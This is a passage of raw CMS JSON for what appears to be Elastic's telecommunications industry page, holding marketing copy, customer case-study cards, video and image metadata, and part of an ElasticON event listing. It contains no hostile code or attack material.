5G...","title_text":{"icon_next_to_topic_heading":{"file":null,"type":null},"topic_heading_l10n":"","title_l10n":"","paragraph_l10n":"","modular_blocks":[],"style":{"dark_mode":"","layout":null,"left_align_text":false,"title_heading_size":"H2","two_column_layout":false}},"updated_at":"2022-08-12T11:48:53.944Z","updated_by":"blt3e52848e0cb3c394","_content_type_uid":"text_image_video","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-12T11:49:00.564Z","user":"blt3e52848e0cb3c394"}}],"dark_mode":""}},{"generic_body":{"title_l10n":"Video | The power of generative AI for telco","reference":[{"_content_type_uid":"image_video","uid":"blt7eb4c80cb7aaa672","_version":11,"locale":"en-us","ACL":{},"component_theme":{"color":null,"theme_type":null,"module_color":null,"container_color":null,"container_border_radius":null,"container_style":null,"divider_top":null,"divider_bottom":null,"spacer_top":null,"spacer_bottom":null},"created_at":"2023-12-04T21:11:37.006Z","created_by":"blt3044324473ef223b70bc674c","logo_bar_reference":[],"reference":[{"_content_type_uid":"video_reference","uid":"blt7af39ad71430720f","_version":1,"locale":"en-us","ACL":{},"border_radius":null,"caption_l10n":"","created_at":"2023-12-04T21:11:24.584Z","created_by":"blt3044324473ef223b70bc674c","footnote_l10n":"","hide_controls":false,"image":null,"loop":false,"looping_animation":false,"mute":false,"play_count":"","shadow":true,"tags":[],"title":"UgRhyVZFAhbbcahHa2JbyA","type":"vidyard","updated_at":"2023-12-04T21:11:24.584Z","updated_by":"blt3044324473ef223b70bc674c","video":null,"video_url_l10n":"","vidyard":[{"_version":1,"locale":"en-us","uid":"blt816389ca16566528","ACL":{},"created_at":"2023-12-04T21:10:18.478Z","created_by":"blt3044324473ef223b70bc674c","disable_analytics":false,"player_id":"","tags":[],"title":"UgRhyVZFAhbbcahHa2JbyA","updated_at":"2023-12-04T21:10:18.478Z","updated_by":"blt3044324473ef223b70bc674c","uuid":"UgRhyVZFAhbbcahHa2JbyA","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-04T21:10:22.325Z","user":"blt3044324473ef223b70bc674c"}}],"publish_details":{"time":"2023-12-04T21:11:29.519Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"tags":[],"title":"Industries - Telecommunications - The power of generative AI for telco","title_text":{"icon_next_to_topic_heading":{"file":null,"type":null},"topic_heading_l10n":"Generative AI telecommunications use cases","title_l10n":"The power of generative AI for telco","paragraph_l10n":"\u003cp\u003eGenerative AI has the ability to transform the telecommunications industry. Watch this video series to learn about generative AI telecommunications use cases, the value this new technology can bring to customers and employees, and key considerations for getting started. Keep watching to see an example generative AI demo for telecommunications employees.\u003c/p\u003e","modular_blocks":[{"cta":{"alignment":"center align","width":null,"list":[{"type":"tertiary","file":null,"_metadata":{"uid":"cs5a20218e3624e75a"},"icon_direction":null,"title_l10n":"Contact us","url":"/contact?baymax=rtp\u0026rogue=eswt-1165-b#sales"}],"_metadata":{"uid":"cse88196102408cb9f"},"footnote_l10n":""}}],"style":{"dark_mode":"","layout":"one-column","left_align_text":false,"title_heading_size":"H2","two_column_layout":false}},"updated_at":"2023-12-07T18:22:26.710Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2023-12-07T18:42:01.658Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"dark_mode":"","_metadata":{"uid":"cs4c6f28ef9a76f318"}}},{"card":{"title_l10n":"Telco - Customer Case Studies","_metadata":{"uid":"csec68fc4651bfecf5"},"card_reference":[{"_version":6,"locale":"en-us","uid":"blt32f6af2ba600a729","ACL":{},"below_card_modular_blocks":[],"card_deck_style":{"type":"no outline card","border_color":"#0077CC","border_direction":"top","border_radius":"10px","padding":"card-large","per_row":"4","shadow":"shadow-light","shadow_hover":null,"image_alignment":"center align","paragraph_alignment":null,"text_alignment":"center align","title_heading_alignment":null,"topic_heading_alignment":null,"image_border_color":"","image_border_style":"","image_border_width":"","image_filter":"","background_color_hover":null,"border":"elastic-blue","component_container_border_radius":"","component_container_padding":null,"component_container_show_border":false,"container_background_color":null,"size_title_heading":null},"card_modular_blocks":[{"card":{"title_l10n":"Verizon","_metadata":{"uid":"cs99e13e70d1b79e08"},"modular_blocks":[{"topic_heading":{"topic_heading_l10n":"Customer spotlight","_metadata":{"uid":"cs810876ac10f75bd8"},"style":null,"image":{"type":null,"file":null,"alt_text_l10n":""}}},{"image":{"type":"logo","file":{"uid":"blt2662337af018e508","ACL":{},"_version":1,"content_type":"image/svg+xml","created_at":"2020-04-29T20:24:53.111Z","created_by":"blt3044324473ef223b70bc674c","file_size":"5322","filename":"logoparade-verizon.svg","is_dir":false,"tags":[],"title":"logoparade-verizon.svg","updated_at":"2022-02-11T21:01:14.609Z","updated_by":"blt3044324473ef223b70bc674c","parent_uid":"blt6d22b227aff4713c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-03-09T20:04:29.183Z","user":"blt36e890d06c5ec32c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt2662337af018e508/5ea9e29503f6e72ff388c17c/logoparade-verizon.svg"},"_metadata":{"uid":"csa263da7e57005655"},"alt_text_l10n":"Verizon logo"}},{"paragraph":{"paragraph_l10n":"\u003cp\u003eCutting costs and increasing customer satisfaction. Reduced MTTR by 10x. \n\u003c/p\u003e","_metadata":{"uid":"cs49ae72586213f967"}}},{"cta":{"alignment":"center align","width":"inline","list":[{"type":"tertiary","file":null,"_metadata":{"uid":"cs65fac216e5ecc468"},"icon_direction":null,"title_l10n":"Learn more","url":"/customers/verizon-wireless"}],"_metadata":{"uid":"csa1b35d0bca848f0f"}}}],"style":{"background_color":"","border_color":"","border_direction":null,"highlight_card_with_text_above_l10n":""}}},{"card":{"title_l10n":"Entel","_metadata":{"uid":"csf2fad47c03c58f69"},"modular_blocks":[{"topic_heading":{"topic_heading_l10n":"Customer spotlight","_metadata":{"uid":"cs9585212638c61dbd"},"style":null,"image":{"type":null,"file":null,"alt_text_l10n":""}}},{"image":{"type":"logo","file":{"_version":1,"is_dir":false,"uid":"blt4a293e73e2cfb29d","ACL":{},"content_type":"image/svg+xml","created_at":"2020-05-07T18:12:46.971Z","created_by":"blt3044324473ef223b70bc674c","file_size":"9312","filename":"logoparade-entel.svg","tags":[],"title":"logoparade-entel.svg","updated_at":"2022-02-11T21:00:41.866Z","updated_by":"blt3044324473ef223b70bc674c","parent_uid":"blt6d22b227aff4713c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-03-09T20:05:53.647Z","user":"blt36e890d06c5ec32c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt4a293e73e2cfb29d/5eb44f9ec83f71298799eee5/logoparade-entel.svg"},"_metadata":{"uid":"cs2b3fe1d33a71bdb7"},"alt_text_l10n":"Entel logo"}},{"paragraph":{"paragraph_l10n":"\u003cp\u003eFuture-proofing the business. Reduced MTTR by 80%. \n\u003c/p\u003e","_metadata":{"uid":"cseee2db3b723d1e78"}}},{"cta":{"alignment":"center align","width":"inline","list":[{"type":"tertiary","file":null,"_metadata":{"uid":"cs35a51f213e787a53"},"icon_direction":null,"title_l10n":"Learn more","url":"/customers/entel"}],"_metadata":{"uid":"cs41172f698eaee944"}}}],"style":{"background_color":"","border_color":"","border_direction":null,"highlight_card_with_text_above_l10n":""}}},{"card":{"title_l10n":"Deutsche Telekom","_metadata":{"uid":"csf97c4af48536631b"},"modular_blocks":[{"topic_heading":{"topic_heading_l10n":"Customer spotlight","_metadata":{"uid":"cs3fcf31f8c8bb5111"},"style":null,"image":{"type":null,"file":null,"alt_text_l10n":""}}},{"image":{"type":"logo","file":{"_version":1,"is_dir":false,"uid":"bltf190f51b9f6622ca","ACL":{},"content_type":"image/png","created_at":"2021-10-29T17:30:41.720Z","created_by":"blt3044324473ef223b70bc674c","file_size":"3336","filename":"logoparade-deutsche-telekom.png","tags":[],"title":"logoparade-deutsche-telekom.png","updated_at":"2022-02-11T20:59:36.510Z","updated_by":"blt3044324473ef223b70bc674c","parent_uid":"blt6d22b227aff4713c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-11T16:44:54.296Z","user":"blt36e890d06c5ec32c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf190f51b9f6622ca/617c2fc1a2b4ac1067d76acc/logoparade-deutsche-telekom.png"},"_metadata":{"uid":"cs72cb80deb3c2df4b"},"alt_text_l10n":"Deutsche Telekom logo"}},{"paragraph":{"paragraph_l10n":"\u003cp\u003eMonitoring voice data traffic. Unified fault, performance, and predictive management.\n\u003c/p\u003e","_metadata":{"uid":"csb19d1383058a08ba"}}},{"cta":{"alignment":"center align","width":"inline","list":[{"type":"tertiary","file":null,"_metadata":{"uid":"cs381cb2d427195389"},"icon_direction":null,"title_l10n":"Learn more","url":"/blog/telecommunications-observability-elastic-stack-monitoring-voice-traffic-data"}],"_metadata":{"uid":"csb8e51a9e16779329"}}}],"style":{"background_color":"","border_color":"","border_direction":null,"highlight_card_with_text_above_l10n":""}}},{"card":{"title_l10n":"Furuno","_metadata":{"uid":"csdc7fd4643b9d72e9"},"modular_blocks":[{"topic_heading":{"topic_heading_l10n":"Customer spotlight","_metadata":{"uid":"cse0f6e1cd0656eed7"},"style":null,"image":{"type":null,"file":null,"alt_text_l10n":""}}},{"image":{"type":"logo","file":{"uid":"bltc37e388c34332f02","_version":1,"parent_uid":"blt6d22b227aff4713c","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-24T17:06:01.983Z","updated_at":"2022-02-11T21:00:29.757Z","content_type":"image/svg+xml","file_size":"4019","filename":"logoparade-furuno.svg","title":"logoparade-furuno.svg","ACL":{},"is_dir":false,"tags":[],"publish_details":{"time":"2024-04-17T22:59:42.824Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc37e388c34332f02/5ef387f9704e3d1cf536f9f6/logoparade-furuno.svg"},"_metadata":{"uid":"csee2de453b413e506"},"alt_text_l10n":"Furuno logo"}},{"paragraph":{"paragraph_l10n":"\u003cp\u003eOptimizing satellite communications at sea. Improved mean time to knowledge by 94%. \n\u003c/p\u003e","_metadata":{"uid":"cs80852e2f1f4fc773"}}},{"cta":{"alignment":"center align","width":"inline","list":[{"type":"tertiary","file":null,"_metadata":{"uid":"csec755e8263dd0c9b"},"icon_direction":null,"title_l10n":"Learn more","url":"/customers/furuno"}],"_metadata":{"uid":"csd710e886c549416f"}}}],"style":{"background_color":"","border_color":"","border_direction":null,"highlight_card_with_text_above_l10n":""}}}],"created_at":"2021-10-28T20:58:18.950Z","created_by":"blt3044324473ef223b70bc674c","spotlight_modular_blocks":[],"tags":[],"title":"Telco - Customer case studies","title_text":{"topic_heading_l10n":"","title_l10n":"Customer case studies","paragraph_l10n":"\u003cp\u003eElastic's search platform for communications service providers (CSPs) enables customers to cut costs, improve customer satisfaction, and more.\n\u003c/p\u003e","modular_blocks":[{"cta":{"alignment":"center align","width":null,"list":[{"type":"tertiary","file":null,"_metadata":{"uid":"cs63c3fb764ffa0969"},"icon_direction":null,"title_l10n":"See all customer stories","url":"/customers/success-stories?industry=telecommunications"}],"_metadata":{"uid":"cse0e2e8f3074dcc27"},"footnote_l10n":""}}],"style":{"dark_mode":"","layout":null,"left_align_text":false,"two_column_layout":false,"title_heading_size":null},"icon_next_to_topic_heading":{"file":null,"type":null}},"updated_at":"2024-08-19T16:31:28.672Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-19T16:31:34.261Z","user":"blt3e52848e0cb3c394"}}],"background_color_for_component_container":"","background_color_for_cards":""}},{"carousel":{"title_l10n":"Drive customer centricity","_metadata":{"uid":"csd56890297a833be0"},"location":null,"carousel_reference":[],"reference":[{"_content_type_uid":"carousel","_version":4,"locale":"en-us","uid":"bltd1399b525e402efd","ACL":{},"carousel_modular_blocks":[{"video":{"tab_title_l10n":"Provide a zero-touch experience","_metadata":{"uid":"cs63d406057af67430"},"tab_url":"","tab_paragraph_l10n":"\u003cp\u003eUse ML, vector search, and NLP for predictive and proactive analytics, eliminating any friction during the customer journey. See how to reduce churn and maximize customer lifetime value.\u003c/p\u003e","source":{"file":null,"vidyard_uuid":"i4ZV9akMs7rjoCyWaDtffj"},"settings":{"data_chapter":"","hide_controls":true,"loop_video":true,"muted":true,"shadow":true,"play_count":"auto"}}},{"video":{"tab_title_l10n":"Improve service quality","_metadata":{"uid":"cs2420858cbf6ddce4"},"tab_url":"","tab_paragraph_l10n":"\u003cp\u003eMap network performance metrics and system KPIs to customer behavior. Learn how to correlate all data sources to see how service quality impacts revenue.\u003c/p\u003e","source":{"file":null,"vidyard_uuid":"QjtXkVijeo3xuuEK163fm5"},"settings":{"data_chapter":"","hide_controls":true,"loop_video":true,"muted":true,"shadow":true,"play_count":"auto"}}},{"video":{"tab_title_l10n":"Enable real-time situational awareness","_metadata":{"uid":"cs2aa866dbe4b06258"},"tab_url":"","tab_paragraph_l10n":"\u003cp\u003eReduce MTTR with relevant real-time insights. Find out how to associate alerts and performance metrics to achieve business objectives.\u003c/p\u003e","source":{"file":null,"vidyard_uuid":"tjnE7MReeY843DLoeteWiM"},"settings":{"data_chapter":"","hide_controls":true,"loop_video":true,"muted":true,"shadow":true,"play_count":"auto"}}}],"created_at":"2022-09-20T21:31:54.939Z","created_by":"blt36e890d06c5ec32c","style":{"type":"two-column, tab labels left, tab description - accordion","width":"10 column","carousel_container_background_color":"","carousel_container_border_radius":"","carousel_container_padding":null,"carousel_container_shadow":null,"tab_label_opacity":null},"tags":[],"title":"Telco - Drive customer centricity","title_text":{"topic_heading_l10n":"","title_l10n":"Drive customer centricity","paragraph_l10n":"\u003cp\u003eImplement proactive customer service. Answer questions in real -time. Build customer trust through secure\u0026nbsp;operations.\n\u003c/p\u003e","modular_blocks":[],"style":{"dark_mode":"","layout":null,"left_align_text":false,"title_heading_size":"H2","two_column_layout":false},"icon_next_to_topic_heading":{"file":null,"type":null}},"updated_at":"2022-11-29T09:38:59.653Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-11-29T09:39:03.346Z","user":"blt3e52848e0cb3c394"}}],"color_theme_mode":""}},{"generic_body":{"title_l10n":"Text Image - Data-driven innovations for sustainable networks","_metadata":{"uid":"cs7335c9464ad96e70"},"reference":[{"_version":1,"locale":"en-us","uid":"blt895bf87e9a5aa7f3","ACL":{},"created_at":"2022-08-12T13:34:28.167Z","created_by":"blt3e52848e0cb3c394","dark_mode":"","dark_mode_even_rows":false,"module":[{"icon":{"type":null,"file":null,"alt_text":""},"_metadata":{"uid":"csecb657e880733552"},"topic_heading_l10n":"","title_l10n":"Data-driven innovations for sustainable networks","paragraph_l10n":"\u003cp\u003eAchieve your sustainability goals with data-led insights into network performance, capacity demand, power consumption, resource allocation, vendor availability, and more.\n\u003c/p\u003e","cta":{"alignment":"left align","width":"block","list":[]},"quote":[],"reference":[{"_content_type_uid":"image_reference","_version":1,"locale":"en-us","uid":"blt69a8eb85039c2963","ACL":{},"alt_text_l10n":"Illustration","caption_l10n":"","created_at":"2022-08-12T13:34:06.873Z","created_by":"blt3e52848e0cb3c394","image":{"_version":1,"is_dir":false,"uid":"blt98b4abc7d98a433c","ACL":{},"content_type":"image/png","created_at":"2021-11-02T18:20:31.601Z","created_by":"blt3044324473ef223b70bc674c","file_size":"162386","filename":"hero-hbp-telco-white-bg-2x.png","parent_uid":null,"tags":[],"title":"hero-hbp-telco-white-bg-2x.png","updated_at":"2021-11-02T18:20:31.601Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-11-03T23:19:54.666Z","user":"blt3044324473ef223b70bc674c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt98b4abc7d98a433c/6181816f7a41520f2aabcbc0/hero-hbp-telco-white-bg-2x.png"},"mobile_image":null,"shadow":false,"tags":[],"title":"hero-hbp-telco-white-bg-2x.png","updated_at":"2022-08-12T13:34:06.873Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-12T13:34:17.818Z","user":"blt3e52848e0cb3c394"}}],"below_paragraph_reference":[],"below_component_reference":[],"dark_mode":""}],"reverse_layout":true,"tags":[],"title":"Telco - Data-driven innovations for sustainable networks","title_text":{"icon_next_to_topic_heading":{"file":null,"type":null},"topic_heading_l10n":"","title_l10n":"","paragraph_l10n":"","modular_blocks":[],"style":{"dark_mode":"","layout":null,"left_align_text":false,"title_heading_size":"H2","two_column_layout":false}},"updated_at":"2022-08-12T13:34:28.167Z","updated_by":"blt3e52848e0cb3c394","_content_type_uid":"text_image_video","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-12T13:34:39.267Z","user":"blt3e52848e0cb3c394"}}],"dark_mode":""}},{"card":{"title_l10n":"Enhancing connectivity experiences in related industries","_metadata":{"uid":"csbb3747c0e93beaf2"},"card_reference":[{"_version":4,"locale":"en-us","uid":"blt81bbe1b9a70c2007","ACL":{},"below_card_modular_blocks":[],"card_deck_style":{"type":"illustration text grid 3x1","background_color":"","border_color":"","border_direction":null,"border_radius":"10px","component_container_background_color":"","component_container_border_radius":"","component_container_padding":null,"padding":null,"per_row":null,"shadow":null,"shadow_hover":null,"image_alignment":"left align","paragraph_alignment":null,"text_alignment":null,"title_heading_alignment":null,"topic_heading_alignment":null,"image_border_color":"","image_border_style":"","image_border_width":"","image_filter":""},"card_modular_blocks":[{"card":{"title_l10n":"Automotive","_metadata":{"uid":"cse4e6ecf6606b4df9"},"modular_blocks":[{"image":{"type":"image-xsmall","file":{"_version":2,"is_dir":false,"uid":"blt7f1f4dcf2f803a4b","ACL":{},"content_type":"image/svg+xml","created_at":"2019-06-17T23:01:50.218Z","created_by":"blt3044324473ef223b70bc674c","description":"","file_size":"167776","filename":"illustration-search-analytics-128.svg","parent_uid":"blt19bfea3747fb788b","tags":[],"title":"illustration-search-analytics-128.svg","updated_at":"2023-06-21T20:44:16.520Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-06-23T19:52:46.049Z","user":"blt36e890d06c5ec32c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt7f1f4dcf2f803a4b/649361202c4f8721501b2910/illustration-search-analytics-128.svg"},"_metadata":{"uid":"cs18a317885c6ef633"},"alt_text_l10n":""}},{"title":{"title_l10n":"Automotive","_metadata":{"uid":"cs222c1b859127cf05"},"url":"","size_title":null}},{"paragraph":{"paragraph_l10n":"\u003cp\u003eLearn how Elastic is ensuring a secured connected car experience.\u003c/p\u003e","_metadata":{"uid":"cs84371ff286c8f5aa"}}},{"cta":{"alignment":"left align","width":"block","list":[{"type":"tertiary","file":null,"_metadata":{"uid":"cs4e368d3237bd9022"},"icon_direction":null,"title_l10n":"Learn more","url":"/blog/elastic-announces-tisax-certification-security-connected-vehicles"}],"_metadata":{"uid":"cs51f77c3c2c6b9ebc"}}}],"style":{"background_color":"","border_color":"","border_direction":null}}},{"card":{"title_l10n":"Manufacturing","_metadata":{"uid":"cs6653d51015c63eea"},"modular_blocks":[{"image":{"type":"image-xsmall","file":{"uid":"blt10dd644478e9944f","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2022-05-12T01:15:09.525Z","updated_at":"2023-06-16T02:48:13.602Z","content_type":"image/svg+xml","file_size":"226211","filename":"illustration-task-automation-128.svg","title":"illustration-task-automation-128.svg","ACL":{},"_version":2,"parent_uid":null,"is_dir":false,"tags":[],"description":"","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-06-21T22:12:47.275Z","user":"blt36e890d06c5ec32c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt10dd644478e9944f/648bcd6dcb6702268b15831d/illustration-task-automation-128.svg"},"_metadata":{"uid":"csa697911f478dd182"},"alt_text_l10n":""}},{"title":{"title_l10n":"Manufacturing","_metadata":{"uid":"cs5bd7024bcd9074de"},"url":"","size_title":null}},{"paragraph":{"paragraph_l10n":"\u003cp\u003eFind out how Elastic is helping industries with digital transformation.\u003c/p\u003e","_metadata":{"uid":"csde679be67134b780"}}},{"cta":{"alignment":"left align","width":"block","list":[{"type":"tertiary","file":null,"_metadata":{"uid":"cs18a7e3ef84072ce0"},"icon_direction":null,"title_l10n":"Learn more","url":"/industries/manufacturing"}],"_metadata":{"uid":"csb1c7d5cdf53da807"}}}],"style":{"background_color":"","border_color":"","border_direction":null}}},{"card":{"title_l10n":"Retail","_metadata":{"uid":"cs9d9ddbc2ee21e8a5"},"modular_blocks":[{"image":{"type":"image-xsmall","file":{"_version":2,"is_dir":false,"uid":"blt70efe238ed6f0f32","ACL":{},"content_type":"image/svg+xml","created_at":"2020-02-13T23:46:17.100Z","created_by":"blt3044324473ef223b70bc674c","description":"","file_size":"156304","filename":"illustration-shopping-cart-128.svg","parent_uid":"blt19bfea3747fb788b","tags":[],"title":"illustration-shopping-cart-128.svg","updated_at":"2023-06-16T02:42:04.496Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-06-22T02:15:52.360Z","user":"blt3044324473ef223b70bc674c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt70efe238ed6f0f32/648bcbfc48a8ff0b3a476e4f/illustration-shopping-cart-128.svg"},"_metadata":{"uid":"cs15ddbcc9fa4dab73"},"alt_text_l10n":""}},{"title":{"title_l10n":"Retail","_metadata":{"uid":"cs13347a5b03f86f48"},"url":"","size_title":null}},{"paragraph":{"paragraph_l10n":"\u003cp\u003eDiscover how retail giants are driving brand loyalty using Elastic.\u003c/p\u003e","_metadata":{"uid":"csd3fdffce6a21b2b6"}}},{"cta":{"alignment":"left align","width":"block","list":[{"type":"tertiary","file":null,"_metadata":{"uid":"cs370c7031d4d5ae5d"},"icon_direction":null,"title_l10n":"Learn more","url":"/industries/retail-ecommerce"}],"_metadata":{"uid":"csad59fa1bafa3554e"}}}],"style":{"background_color":"","border_color":"","border_direction":null}}}],"created_at":"2022-05-12T01:15:59.876Z","created_by":"blt3044324473ef223b70bc674c","spotlight_modular_blocks":[],"tags":[],"title":"Telco - Enhancing connectivity experiences in related industries","title_text":{"topic_heading_l10n":"","title_l10n":"Enhancing connectivity experiences in related\u0026nbsp;industries","paragraph_l10n":"\u003cp\u003eExpand to new verticals and industries with an intelligent data-led approach. Build partnerships to bring new capabilities that can drive innovation in connectivity-based services across industries.\u003c/p\u003e","modular_blocks":[{"cta":{"alignment":"center align","width":null,"list":[{"type":"tertiary","file":null,"_metadata":{"uid":"cs4123d899c5075819"},"icon_direction":null,"title_l10n":"Download the guide","url":"/industries/telecommunications/enable-real-time-insights-at-telco-scale"}],"_metadata":{"uid":"csf18253d1d1715174"},"footnote_l10n":""}}],"style":{"dark_mode":"","layout":null,"left_align_text":false,"title_heading_size":"H2","two_column_layout":false}},"updated_at":"2023-06-23T19:48:44.125Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-06-23T22:11:30.737Z","user":"blt36e890d06c5ec32c"}}],"background_color_for_component_container":"","background_color_for_cards":""}}],"module_header":null,"seo":{"seo_title_l10n":"Elastic for Telecommunications","seo_description_l10n":"Learn about the Search \u0026 Data Platform for Telecommunications from Elastic that enables this sector to transform operations in the 5G era, gain deeper insight into key performance indicators, enhance the customer experience, reduce the cost of customer acquisition, and protect the brand from outages or security incidents.","seo_image":null,"canonical_tag":"","noindex":false,"nofollow":false},"social_media":{"topic_heading_l10n":"","display_social_media_module":false},"stakeholder_information":{"shadow_doc":"","stakeholder":""},"structured_data":{"data_l10n":""},"tags":[],"tags_content_type":[],"tags_elastic_stack":[],"tags_industry":[],"tags_language":[],"tags_role":[],"tags_stage":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":null,"title":"Telco - Achieve real-time, high- resolution insights at telco scale","updated_at":"2023-12-04T21:12:10.709Z","updated_by":"blt3044324473ef223b70bc674c","url":"/industries/telecommunications","whats_new_reference":[],"publish_details":{"time":"2023-12-13T19:59:15.162Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},"locale":"","videos":[[{"uid":"bltbf1a84ce72d54061","_version":7,"locale":"en-us","ACL":{},"created_at":"2025-02-11T22:32:54.367Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"ElasticON San Francisco 2024 | Adobe","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":[],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":null},"paragraph_l10n":"\u003cp\u003eJoin Elastic's Steve Kearns and Adobe's Varsha Chandan and Jordan Moore to explore how the latest platform innovations and AI integration can streamline development and issue diagnosis.\u003c/p\u003e\n\u003ch4\u003eHighlights\u003c/h4\u003e\n\u003cul\u003e\n \u003cli\u003eUncovering how the latest platform innovations simplify building and scaling Elastic solutions\u003c/li\u003e\n \u003cli\u003eLeveraging AI and Elasticsearch to reduce time and costs associated with developer tools\u003c/li\u003e\n \u003cli\u003eDiagnosing issues more efficiently using AI and Elasticsearch\u003c/li\u003e\n \u003cli\u003eThe role of AI in enhancing developer productivity\u003c/li\u003e\n \u003cli\u003eFuture milestones for evolving development tools with AI\u003c/li\u003e\n \u003cli\u003eHow Elastic’s platform innovations support your organization's scaling needs\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eWant to stay in the loop on all things Elastic?\u003c/h4\u003e\n\u003cp\u003e\u003ca href=\"/events?tab=1\" target=\"_self\"\u003eJoin us\u003c/a\u003e at our upcoming events or check out \u003ca href=\"/events/elasticon/archive\" target=\"_self\"\u003eElasticON's video archive\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"/community\" target=\"_self\"\u003eGet connected\u003c/a\u003e to find help from the Elastic community.\u003c/p\u003e","presentation_date":"2025-02-10T16:00:00.000Z","presenter":["blta88061c105b8011d","blt6d541ad58e5164d9","blt3c68347d16e32c8b"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"ElasticON San Francisco 2024 | Adobe","seo_description_l10n":"","seo_keywords_l10n":"","seo_image":null,"noindex":true},"tags":[],"tags_elastic_stack":["blt6f3b5313b04c2729"],"tags_event_type":[{"_version":3,"locale":"en-us","uid":"blt1671c05cb4d5e1af","ACL":{},"created_at":"2020-06-17T03:41:39.784Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticon","label_l10n":"ElasticON","tags":[],"title":"ElasticON","updated_at":"2021-03-04T18:54:01.311Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-01-25T09:15:42.772Z","user":"blt3e52848e0cb3c394"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":["bltccf54d4afac13158","blt0c39553861919e12","blt25a1df5963785e04"],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"bltdeb5e512cabf0e10","ACL":{},"created_at":"2023-11-03T17:34:50.549Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"platform","label_l10n":"Platform","tags":[],"title":"Platform","updated_at":"2023-11-03T17:34:53.443Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.235Z","user":"blt4b2e1169881270a8"}},{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}}],"timezone":{"title_l10n":"","url":""},"title":"ElasticON 2024/2025 - ElasticON San Francisco 2024 | 